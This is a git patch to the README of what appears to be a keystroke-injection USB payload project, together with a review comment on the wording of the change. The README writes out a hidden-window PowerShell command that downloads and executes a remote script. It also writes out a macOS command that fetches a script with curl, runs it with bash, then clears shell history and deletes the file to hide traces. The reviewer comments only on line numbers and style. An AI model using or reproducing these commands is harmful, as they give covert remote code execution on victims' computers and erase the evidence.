From d14f07167afaf15b21a8c2c9d275cf88dabbabe8 Mon Sep 17 00:00:00 2001 From: msr8 Date: Fri, 7 Oct 2022 16:06:38 +0530 Subject: [PATCH] ecer do --- Payloads/Script Runner/README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Payloads/Script Runner/README.md b/Payloads/Script Runner/README.md index 4252ce2..199a454 100644 --- a/Payloads/Script Runner/README.md +++ b/Payloads/Script Runner/README.md @@ -1,8 +1,8 @@ # Script Runner
-**script_runner_win.ino:** Once plugged in, it hits win+r which opens the run menu. Then it types out `powershell -w h iex (irm "[url]")`. Here, `-w h` makes it so the process is ran in a hidden window, `irm "[url]"` sends a request to the url and gets the raw text which is then executed by `iex` +**script_runner_win.ino:** Once plugged in, it hits win+r which opens the run menu. Then it types out `powershell -w h iex (irm "[url]")`. Here, `-w h` makes it so the process is ran in a hidden window, `irm "[url]"` sends a request to the url and gets the raw text which is then executed by `iex`. Put the url to your script at line 19
-**script_runner_mac.ino:** Once plugged in, it hits cmd+space which opens spotlight. Then it types `Terminal.app` and hits enter to open up the terminal application. Then it types out `"$( curl "[url]" > $TMPDIR/16691615; bash $TMPDIR/16691615; history -c; rm ~/.bash_history;rm $TMPDIR/16691615 )" & disown;`, and then it quits the terminal by hitting command+q and then enter (it hits enter because of the "Do you want to terminate the processes in this window" prompt). Here, `curl "[url]" > $TMPDIR/16691615` saved the script to a file, `bash $TMPDIR/16691615` executed the file, `history -c`, `rm ~/.bash_history`, `rm $TMPDIR/16691615` clear our traces, and `& disown` ensures that these processes keep running even if the terminal is exited +**script_runner_mac.ino:** Once plugged in, it hits cmd+space which opens spotlight. Then it types `Terminal.app` and hits enter to open up the terminal application. Then it types out `"$( curl "[url]" > $TMPDIR/16691615; bash $TMPDIR/16691615; history -c; rm ~/.bash_history;rm $TMPDIR/16691615 )" & disown;`, and then it quits the terminal by hitting command+q and then enter (it hits enter because of the "Do you want to terminate the processes in this window" prompt). Here, `curl "[url]" > $TMPDIR/16691615` saved the script to a file, `bash $TMPDIR/16691615` executed the file, `history -c`, `rm ~/.bash_history`, `rm $TMPDIR/16691615` clear our traces, and `& disown` ensures that these processes keep running even if the terminal is exited. Put the url to your script at line 26
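Review bot: The two sentences added at the end of the `script_runner_win.ino` and `script_runner_mac.ino` entries ("Put the url to your script at line 19" and "... at line 26") tie the README to hard-coded line numbers in the sketches, and these will go stale the next time either file is edited. I would point readers at the `[url]` placeholder string itself, or at a named constant near the top of each sketch, instead of a line number. Minor points: both new sentences lack a terminal period, "url" should read "URL", and the subject line "ecer do" does not say what the commit changes.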